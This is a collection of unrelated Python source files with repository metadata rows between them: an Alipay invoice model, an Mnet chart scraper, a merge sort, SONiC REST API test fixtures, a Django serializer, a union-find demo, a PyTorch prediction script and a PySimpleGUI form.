    def invoice_title(self, value):
        if isinstance(value, InvoiceTitleQueryOpenModel):
            self._invoice_title = value
        else:
            self._invoice_title = InvoiceTitleQueryOpenModel.from_alipay_dict(value)

    def to_alipay_dict(self):
        """Serialize every populated (truthy) field into a plain dict."""
        params = dict()
        for name in self._PLAIN_FIELDS + ('invoice_title',):
            value = getattr(self, name)
            if value:
                if hasattr(value, 'to_alipay_dict'):
                    params[name] = value.to_alipay_dict()
                else:
                    params[name] = value
        if self.invoice_content:
            # Convert list elements in place, mirroring the generated code.
            if isinstance(self.invoice_content, list):
                for i in range(0, len(self.invoice_content)):
                    element = self.invoice_content[i]
                    if hasattr(element, 'to_alipay_dict'):
                        self.invoice_content[i] = element.to_alipay_dict()
            if hasattr(self.invoice_content, 'to_alipay_dict'):
                params['invoice_content'] = self.invoice_content.to_alipay_dict()
            else:
                params['invoice_content'] = self.invoice_content
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model from a response dict; returns None for empty input.

        Assignment goes through the properties, so nested dicts for
        `invoice_content` / `invoice_title` are converted exactly as before.
        """
        if not d:
            return None
        o = InvoiceQueryOpenModel()
        for name in InvoiceQueryOpenModel._PLAIN_FIELDS + ('invoice_content', 'invoice_title'):
            if name in d:
                setattr(o, name, d[name])
        return o


def _plain_property(name):
    """Create a pass-through property backed by the '_<name>' slot."""
    attr = '_' + name

    def _get(self):
        return getattr(self, attr)

    def _set(self, value):
        setattr(self, attr, value)

    return property(_get, _set)


# Attach the trivial properties once, instead of ~14 lines per field.
for _field in InvoiceQueryOpenModel._PLAIN_FIELDS:
    setattr(InvoiceQueryOpenModel, _field, _plain_property(_field))
del _field
| [
"liuqun.lq@alibaba-inc.com"
] | liuqun.lq@alibaba-inc.com |
c3538eb3371b01aba72df474025a27cb07554102 | bb160d2fc2c6182c4ca56c8e4635a14215f8c70f | /test_module/collector_test.py | d89697bcb6a78e55d06285541f3c33103c1160c4 | [] | no_license | bitacademy-howl/Music_Recommendation_mod | 9464ed941ff722123457ba18cf35bccee3640b9b | 94a430df1c65dc4b930f46ade4576bff95b6c27e | refs/heads/master | 2020-03-27T15:18:21.725593 | 2018-11-05T08:55:45 | 2018-11-05T08:55:45 | 146,709,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,630 | py | import datetime
import time
from bs4 import BeautifulSoup
import modules.collection.crawler as cw
from db_accessing import *
from db_accessing.VO import Music_VO, Artist_VO, Album_VO
from modules.collection.urlMaker import UrlMaker
class Collector:
    """Scrapes Mnet chart/track/artist pages and upserts them through the ORM.

    The crawling_* helpers are stateless page scrapers; the collecting_*
    methods drive them over date ranges or over rows already in the DB.

    Bug fixes versus the original:
      * the crawling_* helpers were plain functions declared in the class
        body, so instance calls like ``self.crawling_artist(id)`` passed the
        instance as the first argument and raised TypeError; they are now
        @staticmethod, which also keeps the existing
        ``Collector.crawling_mnet_month_chart(url)`` call style working.
      * ``Music_VO.qurey`` typo fixed to ``Music_VO.query``.
      * ``set_start_date`` ignored its arguments; it now uses them (the
        defaults reproduce the old behaviour).
    """

    @staticmethod
    def crawling_mnet_month_chart(url):
        """Scrape one Mnet monthly-chart page and upsert the artist, album
        and music rows it lists."""
        artistVO = Artist_VO()
        albumVO = Album_VO()
        musicVO = Music_VO()

        html = cw.crawling(url=url)
        bs = BeautifulSoup(html, 'html.parser')

        # The chart rows live in the table body of the MMLTable element.
        tag_music_list = bs.find('div', attrs={'class': 'MMLTable jQMMLTable'})
        tag_tbody = tag_music_list.find('tbody')
        tags_tr = tag_tbody.findAll('tr')
        print("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
        for tag_tr in tags_tr:
            item_title_tag_td = tag_tr.find('td', attrs={'class': 'MMLItemTitle'})
            # The hidden checkbox input carries the track's unique id.
            musicVO.Music_ID = tag_tr.find('td', attrs={'class': 'MMLItemCheck'}).find('input')["value"]
            musicVO.Music_Title = item_title_tag_td.find('a', attrs={'class': 'MMLI_Song'}).get_text()
            album_tag = item_title_tag_td.find('a', attrs={'class': 'MMLIInfo_Album'})
            artist_tag = item_title_tag_td.find('a', attrs={'class': 'MMLIInfo_Artist'})
            print(album_tag)
            print(artist_tag)
            if album_tag is not None:
                albumVO.Album_Title = album_tag.get_text()
                albumVO.Album_Node = album_tag["href"].strip(" ")
                # The numeric id is the last path segment of the album link.
                albumVO.Album_ID = int(albumVO.Album_Node.rsplit('/', 1)[1])
                musicVO.Album_ID = albumVO.Album_ID
            if artist_tag is not None:
                artistVO.Artist_Name = artist_tag.get_text()
                artistVO.Artist_Node = artist_tag["href"].strip(" ")
                artistVO.Artist_ID = int(artistVO.Artist_Node.rsplit('/', 1)[1])
                albumVO.Singer_ID = artistVO.Artist_ID
            # TODO(review): merge/commit per row is slow; investigate one
            # commit per page and letting the ORM cascade related objects.
            db_session.merge(artistVO)
            db_session.commit()
            db_session.merge(albumVO)
            db_session.commit()
            db_session.merge(musicVO)
            db_session.commit()

    @staticmethod
    def crawling_track(url):
        """Scrape a single track page.

        NOTE(review): parsing is unfinished -- the VOs are filled but never
        merged into the session, and Music_ID is never set.
        """
        musicVO = Music_VO()
        albumVO = Album_VO()
        artistVO = Artist_VO()
        html = cw.crawling(url=url)
        bs = BeautifulSoup(html, 'html.parser')
        tag_music_info = bs.find('div', attrs={'class': 'music_info_view'})
        # Track summary table.
        summary = tag_music_info.find('div', attrs={'class': 'music_info_cont'})
        album_tag = summary.find('tbody').find('a')
        if album_tag is not None:
            albumVO.Album_Node = album_tag['href'].strip(" ")
            albumVO.Album_ID = albumVO.Album_Node.rsplit('/', 1)[1]
            musicVO.Album_ID = albumVO.Album_ID
        artist_tag = bs.find('span', attrs={'class': 'artist_txt'}).find('a')
        if artist_tag is not None:
            artistVO.Artist_Node = artist_tag['href'].strip(" ")
            artistVO.Artist_ID = artistVO.Artist_Node.rsplit('/', 1)[1]
            artistVO.Artist_Name = artist_tag.get_text()
            albumVO.Singer_ID = artistVO.Artist_ID
        # TODO(review): the attribute cells below are collected but not
        # parsed yet.
        attrs = summary.find('li', attrs={'class': 'left_con'}).findAll('p', attrs={'class' : 'right'})

    @staticmethod
    def crawling_artist(id):
        """Scrape one artist page by numeric id and upsert the Artist row."""
        artistVO = Artist_VO()
        artistVO.Artist_ID = id
        artistVO.Artist_Node = '/artist/{0}'.format(id)
        artistVO.Group = False
        url = ''.join(['http://www.mnet.com', artistVO.Artist_Node])
        html = cw.crawling(url)
        bs = BeautifulSoup(html, 'html.parser')
        tag_artist_info = bs.find('div', attrs={'class': 'artist_info'})
        if tag_artist_info is not None:
            singer = tag_artist_info.find('a', attrs={'class': 'song_name'})
            if singer is not None:
                artistVO.Artist_Name = singer.get_text()
            else:
                # Fallback: plain-text name in the top-left block.
                artistVO.Artist_Name = tag_artist_info.find('li', attrs={'class': 'top_left'}).find(
                    'p').get_text().strip()
                print("############# strip 결과 #############\n", artistVO.Artist_Name,
                      "\n############# strip 결과 #############\n")
            a = tag_artist_info.find('div', attrs={'class': 'a_info_cont'})
            tags = tag_artist_info.findAll('span', attrs={'class': 'right'})
            for tag in tags:
                if tag is not None:
                    # Normalize whitespace inside the "gender|group" info
                    # strings before splitting on '|'.
                    text_list = tag.get_text().strip().replace(' ', '').replace('\r', '').replace('\n', '').replace(
                        '\t', '').replace('\xa0', '').split('|')
                    print(text_list)
                    for text in text_list:
                        if text == '남성' or text == '여성' or text == '혼성':
                            artistVO.Gender = text
                        if text == '그룹':
                            artistVO.Group = True
            db_session.merge(artistVO)
            db_session.commit()
        # Throttle: without the sleep the site blocks us (firewall/IPS)
        # after roughly 200 requests.
        time.sleep(0.5)

    # Entry points meant to be called from main.
    def collecting_artist(self):
        """Crawl artist ids 1..2,999,999 sequentially."""
        for id in range(1, 3000000, 1):
            self.crawling_artist(id)

    def collecting_track(self, node):
        """Crawl the track page of every Music row already in the DB.

        `node` is currently unused (kept for interface compatibility).
        """
        um = UrlMaker()
        # Bug fix: `Music_VO.qurey` was a typo for `Music_VO.query`.
        row_num_table = Music_VO.query.count()
        for offs in range(0, row_num_table, 10):
            result = Music_VO.query.limit(10).offset(offs).all()
            for i in result:
                self.crawling_track(um.direct_node_connect(i.Music_Node))

    def collecting_chart(self):
        """Crawl the first two pages of every monthly chart in the
        configured date range."""
        um = UrlMaker()
        # NOTE(review): the month range is applied to every year, so for a
        # multi-year span only months between start.month and end.month are
        # visited -- confirm whether that is intended.
        for year in range(self.start_date.year, self.end_date.year+1):
            for month in range(self.start_date.month, self.end_date.month+1):
                try:
                    um.setDate(datetime.date(year, month, day=1))
                    um.url_maker_DATE_based()
                    for page_number in range(1, 3):
                        url = "".join([um.url_maker_DATE_based(), '?pNum=%d' % page_number])
                        print(url)
                        Collector.crawling_mnet_month_chart(url)
                except ValueError:
                    break

    def __init__(self):
        """Default collection window: 2009-08-01 .. today."""
        self.set_start_date()
        self.end_date = datetime.datetime.now().date()

    def set_start_date(self, year = 2009, month = 8, day = 1):
        # Bug fix: the arguments were previously ignored (always 2009-08-01);
        # the defaults keep the old behaviour for argument-less calls.
        self.start_date = datetime.date(year, month, day)

    def set_end_date(self, year, month, day):
        self.end_date = datetime.date(year, month, day)
"howl1118@gmail.com"
] | howl1118@gmail.com |
0ed61bd167a35b1334d7c438c545bdb341018a46 | faef451f80e68a256af92dcc0d63feb86dedcf08 | /algorithms/sorting/merge-sort.py | 42480c48c75d0cc2ef199b4d8d852494e5242f47 | [] | no_license | shakilxyz/python | b36a06fd7b470c02848310e06fd704664e95e37e | 98c4ebf8273b2962f9ad22effed842e1b15b09d8 | refs/heads/main | 2023-06-03T05:01:08.370830 | 2021-06-21T15:21:10 | 2021-06-21T15:21:10 | 256,231,882 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,217 | py | """
Merge sort, implemented with the divide-and-conquer strategy.
It is faster than many other sorting algorithms: in practice it sorts
about 20,000 elements in roughly 0.22 seconds, and its average time
complexity is O(n log n).
In this code the main array is divided into two sub-arrays, a and b,
and those halves are divided again and again until each piece has length 1.
The pieces are then merged back together in sorted order, smallest arrays first.
`left` denotes the left sub-array produced by dividing the main array and
`right` the right one:
left -> a
right -> b
"""
def merge(a, b):
    """Merge two already-sorted lists into one sorted list.

    Ties are resolved in favour of `b`, matching the strict `<` comparison.
    """
    merged = []
    pos_a, pos_b = 0, 0
    len_a, len_b = len(a), len(b)
    while pos_a < len_a and pos_b < len_b:
        if a[pos_a] < b[pos_b]:
            merged.append(a[pos_a])
            pos_a += 1
        else:
            merged.append(b[pos_b])
            pos_b += 1
    # At most one of these two tails is non-empty.
    merged.extend(a[pos_a:])
    merged.extend(b[pos_b:])
    return merged
def mergeSort(array):
    """Sort `array` recursively: split in half, sort each half, merge them."""
    if len(array) > 1:
        mid = len(array) // 2
        return merge(mergeSort(array[:mid]), mergeSort(array[mid:]))
    # A list of length 0 or 1 is already sorted.
    return array
# Demo: sort a small sample list (the duplicate 3 is preserved).
print(mergeSort([10, 3, 18, 4, 32, 19, 27, 0, 3]))
| [
"noreply@github.com"
] | shakilxyz.noreply@github.com |
62ccef834d24c047c8d8308cd15dcbfcacd02062 | 49663ea34b41c8180d7484f778f5cad2e701d220 | /tests/restapi/conftest.py | 8915e5344b0b69e02c6d33ddb2f2045958be013b | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | stepanblyschak/sonic-mgmt | ed08c98e7bff1615b057daa8711686aa5986073d | a1ae1e0b4e9927e6f52916f76121780d19ec3e54 | refs/heads/master | 2023-04-07T01:30:11.403900 | 2023-03-29T10:16:52 | 2023-03-29T10:16:52 | 135,678,178 | 0 | 0 | NOASSERTION | 2023-03-29T16:13:55 | 2018-06-01T06:41:49 | Python | UTF-8 | Python | false | false | 4,694 | py | import logging
import pytest
import urllib3
from six.moves.urllib.parse import urlunparse
from tests.common import config_reload
from tests.common.helpers.assertions import pytest_require as pyrequire
from tests.common.helpers.dut_utils import check_container_state
from helper import apply_cert_config
RESTAPI_CONTAINER_NAME = 'restapi'
@pytest.fixture(scope="module", autouse=True)
def setup_restapi_server(duthosts, rand_one_dut_hostname, localhost):
    '''
    Build a throw-away PKI on the localhost (self-signed CA plus a server
    and a client certificate signed by it), install the CA and server
    material on the DUT, and point the RESTAPI container at it.
    After the module's tests finish, restore the DUT config from minigraph
    and delete the generated key/cert files on the localhost.
    '''
    duthost = duthosts[rand_one_dut_hostname]
    # Check if RESTAPI is enabled on the device
    pyrequire(check_container_state(duthost, RESTAPI_CONTAINER_NAME, should_be_running=True),
              "Test was not supported on devices which do not support RESTAPI!")
    # Create Root key
    local_command = "openssl genrsa -out restapiCA.key 2048"
    localhost.shell(local_command)
    # Create Root cert (self-signed, valid ~5 years)
    local_command = "openssl req \
                    -x509 \
                    -new \
                    -nodes \
                    -key restapiCA.key \
                    -sha256 \
                    -days 1825 \
                    -subj '/CN=test.restapi.sonic' \
                    -out restapiCA.pem"
    localhost.shell(local_command)
    # Create server key
    local_command = "openssl genrsa -out restapiserver.key 2048"
    localhost.shell(local_command)
    # Create server CSR
    local_command = "openssl req \
                    -new \
                    -key restapiserver.key \
                    -subj '/CN=test.server.restapi.sonic' \
                    -out restapiserver.csr"
    localhost.shell(local_command)
    # Sign server certificate with the CA created above
    local_command = "openssl x509 \
                    -req \
                    -in restapiserver.csr \
                    -CA restapiCA.pem \
                    -CAkey restapiCA.key \
                    -CAcreateserial \
                    -out restapiserver.crt \
                    -days 825 \
                    -sha256"
    localhost.shell(local_command)
    # Create client key
    local_command = "openssl genrsa -out restapiclient.key 2048"
    localhost.shell(local_command)
    # Create client CSR
    local_command = "openssl req \
                    -new \
                    -key restapiclient.key \
                    -subj '/CN=test.client.restapi.sonic' \
                    -out restapiclient.csr"
    localhost.shell(local_command)
    # Sign client certificate
    local_command = "openssl x509 \
                    -req \
                    -in restapiclient.csr \
                    -CA restapiCA.pem \
                    -CAkey restapiCA.key \
                    -CAcreateserial \
                    -out restapiclient.crt \
                    -days 825 \
                    -sha256"
    localhost.shell(local_command)
    # Copy CA certificate and server certificate over to the DUT
    duthost.copy(src='restapiCA.pem', dest='/etc/sonic/credentials/')
    duthost.copy(src='restapiserver.crt', dest='/etc/sonic/credentials/testrestapiserver.crt')
    duthost.copy(src='restapiserver.key', dest='/etc/sonic/credentials/testrestapiserver.key')
    apply_cert_config(duthost)
    # Self-signed cert: silence urllib3's insecure-request warnings in tests.
    urllib3.disable_warnings()
    yield
    # Perform a config load_minigraph to ensure config_db is not corrupted
    config_reload(duthost, config_source='minigraph')
    # Delete all created certs
    local_command = "rm \
                    restapiCA.* \
                    restapiserver.* \
                    restapiclient.*"
    localhost.shell(local_command)
@pytest.fixture
def construct_url(duthosts, rand_one_dut_hostname):
    """Return a factory that builds HTTPS URLs for the DUT's RESTAPI port."""
    def get_endpoint(path):
        duthost = duthosts[rand_one_dut_hostname]
        RESTAPI_PORT = "8081"
        netloc = duthost.mgmt_ip + ":" + RESTAPI_PORT
        try:
            tup = ('https', netloc, path, '', '', '')
            endpoint = urlunparse(tup)
        except Exception:
            # Bug fix: the original logged `endpoint` here, but that name is
            # unbound when urlunparse() raises, so the handler itself crashed
            # with a NameError.  Log the inputs instead.
            logging.error("Invalid URL: scheme=https, netloc=%s, path=%s", netloc, path)
            return None
        return endpoint
    return get_endpoint
@pytest.fixture
def vlan_members(duthosts, rand_one_dut_hostname, tbinfo):
    """Return the member ports of the DUT's first VLAN, or [] if none exist."""
    duthost = duthosts[rand_one_dut_hostname]
    VLAN_INDEX = 0
    mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
    vlans = mg_facts["minigraph_vlans"]
    # Idiom fix: an empty dict is falsy; no need to compare against {}.
    if vlans:
        vlan_interfaces = list(vlans.values())[VLAN_INDEX]["members"]
        if vlan_interfaces is not None:
            return vlan_interfaces
    return []
| [
"noreply@github.com"
] | stepanblyschak.noreply@github.com |
91448e8bbbe643023d4f64b1ed66f70b256c713e | 2d3133a877056d36053adfe6ff5b6642eb74f757 | /Movies/serailizer.py | 13998b81d48ecd7a8ff420a5d0a98691432f6b75 | [] | no_license | nirbhaykr/Movies-listing- | 91db3257188afc41440650a29a5d3cbeb554160d | 6b976dd0925b2582a2edc476311e90b2cbe7d0c1 | refs/heads/master | 2021-01-21T13:40:25.106226 | 2016-05-25T11:36:06 | 2016-05-25T11:36:06 | 45,236,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | from rest_framework import serializers
from Movies.models import Movies, Genre
class GenreSerializer(serializers.ModelSerializer):
    """
    Purpose: A serializer that deals with Genre instances and
    querysets.
    """
    class Meta(object):
        model = Genre
        # NOTE(review): no explicit `fields`/`exclude` here -- older DRF
        # versions default to all model fields, newer ones require it;
        # confirm against the installed DRF version.
        # fields = ('category',)
        # read_only_fields = ('entries',)
        # exclude = ('broken_url_flag',)
class MovieSerializer(serializers.ModelSerializer):
    """Serializer for Movies; genres are referenced by their `category` slug."""

    # Bug fix: the original first bound `genre` to a nested GenreSerializer
    # and then immediately rebound the same name to this SlugRelatedField,
    # so the nested serializer was dead code and has been dropped.
    genre = serializers.SlugRelatedField(many=True, queryset=Genre.objects.all(), read_only=False, slug_field='category')

    def create(self, validated_data):
        """Create a Movies row and attach its genres.

        The many-to-many `genre` value cannot be passed to objects.create(),
        so it is popped first and added once the row exists.

        Bug fix: the original only created the movie inside the
        `if validated_data.get('genre')` branch, so a request without genres
        created nothing and the trailing `return mov_obj` raised
        UnboundLocalError.
        """
        category_list = validated_data.pop('genre', None)
        mov_obj = Movies.objects.create(**validated_data)
        if category_list:
            mov_obj.genre.add(*category_list)
        return mov_obj

    class Meta(object):
        model = Movies
        fields = ('id', 'name', 'director', 'popularity', 'imdb_score', 'genre')
| [
"kumar.nirbhay101@gmail.com"
] | kumar.nirbhay101@gmail.com |
6d5d9a2877f278f352cb823a3104ae00dfb625cb | a7a5e113e429d481ab37662a1f108c850658d8fc | /shortener/migrations/0002_auto_20170621_1848.py | 80c2615c028047e29433bcbec079f6135b82b1cd | [
"Apache-2.0"
] | permissive | Showndarya/WebPanel | e16f3603257a7de0a1289e8a955dfcab6056d81a | 3140889303f72bfddc4af3df9a21a118ec7b8e38 | refs/heads/master | 2020-12-02T16:13:05.990827 | 2017-07-07T08:50:45 | 2017-07-07T08:50:45 | 96,520,639 | 1 | 1 | null | 2017-07-07T09:05:35 | 2017-07-07T09:05:35 | null | UTF-8 | Python | false | false | 424 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-21 18:48
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated schema migration: renames the `time_stamp` field of the
    # `urls` model to `timeStamp`.  Generated migrations should not be
    # edited by hand.
    dependencies = [
        ('shortener', '0001_initial'),
    ]
    operations = [
        migrations.RenameField(
            model_name='urls',
            old_name='time_stamp',
            new_name='timeStamp',
        ),
    ]
| [
"Chaitya62@gmail.com"
] | Chaitya62@gmail.com |
4397ea80fcea25905d167fecc3a88d6f60145601 | f3a522b7df742610b81955f4428a7a03ca1b581c | /twss.py | 7ab0767e189942ee5a70a1ac416f0b29e4365304 | [] | no_license | suharshs/TWSS | 44f637a91fde4c9cdb29f15a49f9b237228ce77c | 05374f030f21194c1b040c28887c5bc3b4b1a1bd | refs/heads/master | 2016-09-05T08:53:10.944262 | 2012-08-15T19:11:36 | 2012-08-15T19:11:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | """
The command line tool for inputting files to the classifier.
Author : Suharsh Sivakumar
Date : July 1, 2012
"""
import sys
from naive_bayes import *
# At least one input file must be supplied on the command line.
if len(sys.argv) == 1:
    print('You must input a file that you want to test!')
    exit()

# Classify every file named on the command line and pool the matches.
# Iterating sys.argv[1:] directly replaces the index-based range loop, and
# extend() avoids rebuilding the whole list on every iteration.
twss_list = []
for input_file in sys.argv[1:]:
    twss_list.extend(NaiveBayesClassifier().CheckFile(input_file))

for twss in twss_list:
    print(twss)
"suharshs@gmail.com"
] | suharshs@gmail.com |
class SetNode:
    """One element of a disjoint-set (union-find) forest."""

    def __init__(self, id=None):
        # Payload label; union() concatenates the labels of merged sets.
        self.id = id
        # Parent pointer; makeset() turns a fresh node into its own root.
        self.parent = None
        # Rank: height upper bound used by union-by-rank.
        self.rank = 0
def makeset(id, DSL):
    """Create a singleton set holding `id`, register it with DSL, return its node."""
    node = SetNode(id)
    node.parent = node  # a root points at itself
    DSL.addset(node)
    return node
def findset(x):
    """Return the root of x's set, compressing the path along the way."""
    if x.parent is not x:
        # Recurse to the root and re-point this node straight at it.
        x.parent = findset(x.parent)
    return x.parent
def union(x, y, DSL):
    """Merge the sets containing x and y using union by rank.

    The surviving root absorbs the other root's `id` label (string
    concatenation, as in the original), and the absorbed root is removed
    from DSL's list of live sets.  On an exact rank tie the root of x's
    set survives and its rank grows by one.
    """
    survivor = findset(x)
    loser = findset(y)
    if loser.rank > survivor.rank:
        # The higher-rank root must stay on top.
        survivor, loser = loser, survivor
    elif loser.rank == survivor.rank:
        survivor.rank += 1
    loser.parent = survivor
    survivor.id += loser.id
    DSL.delete(loser)
class DisjointSetList:
    """Tracks the root node of every disjoint set currently alive."""

    def __init__(self):
        self.setlist = []

    def addset(self, x):
        """Register a freshly created root node."""
        self.setlist.append(x)

    def delete(self, x):
        """Forget a root that was absorbed by a union."""
        self.setlist.remove(x)

    def printsets(self):
        """Print the `id` label of every remaining root."""
        for node in self.setlist:
            print(node.id)
# Demo: five singleton sets, two unions, then print the surviving roots.
DSL = DisjointSetList()
a = makeset('a',DSL)
b = makeset('b',DSL)
c = makeset('c',DSL)
d = makeset('d',DSL)
e = makeset('e',DSL)
union(c,d,DSL)  # merges {'c'} and {'d'}
union(c,b,DSL)  # the merged set absorbs {'b'}
DSL.printsets()
| [
"divyammehta@Divyams-MacBook-Pro.local"
] | divyammehta@Divyams-MacBook-Pro.local |
bca4819ea217f20d23ec2024b4071fb1f152036f | 3aefdc5d371bc621984fb843cce7edf121466c0d | /generate_predict.py | 1c3ea8ec8c81cb4642e4965366be1e81beb6a216 | [] | no_license | viet98lx/MC_net | 2edec56ff87914565d800c2d0eea62b95c0154c3 | ee4110b9e8bcacf4abd0301b5e501bc0d2412d4b | refs/heads/master | 2023-03-25T14:01:16.402493 | 2021-03-22T15:13:33 | 2021-03-22T15:13:33 | 347,430,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,408 | py | import os
import torch
import utils
import argparse
import check_point
import model
import scipy.sparse as sp
import data_utils
def generate_predict(model, data_loader, result_file, reversed_item_dict, number_predict, batch_size):
    """Write top-N next-basket predictions for every batch in *data_loader*.

    For each sample two lines go to *result_file*:
      ``ground_truth | <item> <item> ...``  items present in the target basket
      ``predicted_items | <item>:<score> ...``  the *number_predict* highest
      sigmoid-scored items with their scores.

    Args:
        model: trained network exposing ``device`` and ``d_type`` attributes.
        data_loader: yields ``(inputs, seq_lens, targets)`` batches.
        result_file (str): path of the text file to (over)write.
        reversed_item_dict (dict): item index -> original item label.
        number_predict (int): N, how many items to rank per sample.
        batch_size (int): batch size of *data_loader* (for the progress print).
    """
    device = model.device
    # BUGFIX: the original mixed the `batch_size` parameter with a
    # `model.batch_size` attribute when computing the batch count, which
    # crashes for models without that attribute; use the parameter only.
    nb_samples = len(data_loader.dataset)
    total_batch = nb_samples // batch_size
    if nb_samples % batch_size != 0:
        total_batch += 1
    print("Total Batch in data set %d" % total_batch)

    model.eval()
    # no_grad(): inference only — skip autograd bookkeeping.
    with open(result_file, 'w') as f, torch.no_grad():
        for data_x, _data_seq_len, data_y in data_loader:
            x_ = data_x.to(dtype=model.d_type, device=device)
            y_ = data_y.to(dtype=model.d_type, device=device)
            scores = torch.sigmoid(model(x_))
            topk = scores.topk(dim=-1, k=number_predict, sorted=True)
            indices, values = topk.indices, topk.values
            for row in range(indices.size(0)):
                f.write('ground_truth | ')
                ground_truth = y_[row].nonzero().squeeze(dim=-1)
                for idx_key in range(ground_truth.size(0)):
                    f.write(str(reversed_item_dict[ground_truth[idx_key].item()]) + " ")
                f.write('\n')
                f.write('predicted_items ')
                for col in range(indices.size(1)):
                    f.write('| ' + str(reversed_item_dict[indices[row][col].item()])
                            + ':%.8f' % (values[row][col].item()) + ' ')
                f.write('\n')
parser = argparse.ArgumentParser(description='Generate predict')
parser.add_argument('--ckpt_dir', type=str, help='folder contains check point', required=True)
parser.add_argument('--model_name', type=str, help='name of model', required=True)
# parser.add_argument('--epoch', type=int, help='last epoch before interrupt', required=True)
parser.add_argument('--data_dir', type=str, help='folder contains data', required=True)
# parser.add_argument('--nb_hop', type=int, help='level of correlation matrix', default=1)
parser.add_argument('--batch_size', type=int, help='batch size predict', default=8)
parser.add_argument('--nb_predict', type=int, help='number items predicted', default=30)
# parser.add_argument('--log_result_dir', type=str, help='folder to save result', required=True)
args = parser.parse_args()
prefix_model_ckpt = args.model_name
ckpt_dir = args.ckpt_dir
data_dir = args.data_dir
# real_adj_matrix = sp.load_npz(data_dir + 'adj_matrix/r_matrix_'+ str(args.nb_hop) + 'w.npz')
train_data_path = data_dir + 'train_lines.txt'
train_instances = utils.read_instances_lines_from_file(train_data_path)
nb_train = len(train_instances)
print(nb_train)
validate_data_path = data_dir + 'validate_lines.txt'
validate_instances = utils.read_instances_lines_from_file(validate_data_path)
nb_validate = len(validate_instances)
print(nb_validate)
test_data_path = data_dir + 'test_lines.txt'
test_instances = utils.read_instances_lines_from_file(test_data_path)
nb_test = len(test_instances)
print(nb_test)
### build knowledge ###
print("@Build knowledge")
MAX_SEQ_LENGTH, item_dict, reversed_item_dict, item_probs = utils.build_knowledge(train_instances, validate_instances, test_instances)
print("first item in dict ", reversed_item_dict[0])
print("#Statistic")
NB_ITEMS = len(item_dict)
print(" + Maximum sequence length: ", MAX_SEQ_LENGTH)
print(" + Total items: ", NB_ITEMS)
batch_size = args.batch_size
# train_loader = data_utils.generate_data_loader(train_instances, load_param['batch_size'], item_dict, MAX_SEQ_LENGTH, is_bseq=True, is_shuffle=True)
# valid_loader = data_utils.generate_data_loader(validate_instances, load_param['batch_size'], item_dict, MAX_SEQ_LENGTH, is_bseq=True, is_shuffle=False)
test_loader = data_utils.generate_data_loader(test_instances, batch_size, item_dict, MAX_SEQ_LENGTH, is_bseq=True, is_shuffle=True)
load_model = torch.load(ckpt_dir+'/'+prefix_model_ckpt+'.pt')
nb_predict = args.nb_predict
result_file = ckpt_dir+'/'+prefix_model_ckpt+'_predict_top_' + str(nb_predict) + '.txt'
generate_predict(load_model, test_loader, result_file, reversed_item_dict, nb_predict, batch_size) | [
"vietuet98@gmail.com"
] | vietuet98@gmail.com |
45754b9e0e0186c805983ec25d5984a9ecdc1f4e | 3a99ffd8884cb3646b337a811ff0e92cbd67b67e | /testpkg/__init__.py | d7dfdd8f08a81fb05baa04d55f7322c18e491c5e | [
"MIT"
] | permissive | HurricanKai/PythonTest | c2a624d3588a54d603b21da01c10b872f7c3924c | d46c9367279c5e94d7d40e96db87d4016c5d4549 | refs/heads/master | 2022-04-24T14:13:55.655474 | 2020-04-27T12:45:09 | 2020-04-27T12:45:09 | 259,260,633 | 0 | 0 | MIT | 2020-04-27T14:00:40 | 2020-04-27T09:03:09 | Python | UTF-8 | Python | false | false | 76 | py | from version import get_version
__version__ = get_version(pep440=False)
| [
"kai.jellinghaus1@gmail.com"
] | kai.jellinghaus1@gmail.com |
82618b87083e10bfaae60418438d4b4484eff083 | 687b4f2d9cdbe8c72a743a2c329dcd907ad15e42 | /main.py | 9f1a2bfc6aa3a9bd36367f0fc35fb57f1314435c | [] | no_license | tokikk/rsc | 1a8cc4d7fa526ac9e8d8aa879e30d6f9f0175355 | 8ffeb40a21f51913da585488bdedb857002833ca | refs/heads/master | 2022-12-08T09:48:40.042927 | 2020-08-25T10:25:41 | 2020-08-25T10:25:41 | 290,171,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,557 | py | import PySimpleGUI as sg
sg.theme('')
size1 = [[sg.Radio('割合', "RADIO1", font=("Meiryo UI", 14), default=True)],
[
sg.Text(' '),
sg.InputText('100',
font=("Meiryo UI", 13),
size=(5, 1),
justification="right"),
sg.Text('%')
]]
size2 = [[sg.Radio('絶対値', "RADIO1", font=("Meiryo UI", 14))],
[
sg.Text(' '),
sg.InputText('100',
size=(5, 1),
font=("Meiryo UI", 13),
justification="right"),
sg.Text('px * '),
sg.InputText('100',
size=(5, 1),
font=("Meiryo UI", 13),
justification="right"),
sg.Text('px')
]]
size_frame = [[sg.Column(size1), sg.Text(' '), sg.Column(size2)]]
path_frame = [[
sg.InputText("",
key='PathField',
size=(33, 1),
text_color="black",
font=("Meiryo UI", 12),
disabled=True),
sg.FolderBrowse('参照', key='SavedPath')
]]
input_frame = [[
sg.Table([''],
key="Table",
headings=['ファイル'],
auto_size_columns=False,
def_col_width=5,
num_rows=10,
col_widths=[40],
display_row_numbers=False,
header_text_color='#0000ff',
header_background_color='#cccccc')
], [sg.FilesBrowse('参照', key='AddFile', size=(47,1))]]
layout = [[sg.Frame(
'変換サイズ',
size_frame,
font=("Meiryo UI", 12),
)], [sg.Frame(
'保存先',
path_frame,
font=("Meiryo UI", 12),
)],
[sg.Frame('変換対象', input_frame, font=("Meiryo UI", 12))],
[
sg.ProgressBar(100,
orientation='h',
size=(29, 20),
key='progressbar'),
sg.Button(button_text='変換開始')
]]
window = sg.Window('サンプルプログラム', layout)
# --- Event loop: dispatch GUI events until the window is closed ---
while True:
    event, values = window.read()
    print(event, values)
    if event == sg.WIN_CLOSED:  # user closed the window
        break
    if event == 'SavedPath':
        # BUGFIX: assigning into the `values` dict does not refresh the
        # widget; push the chosen folder into the read-only path field.
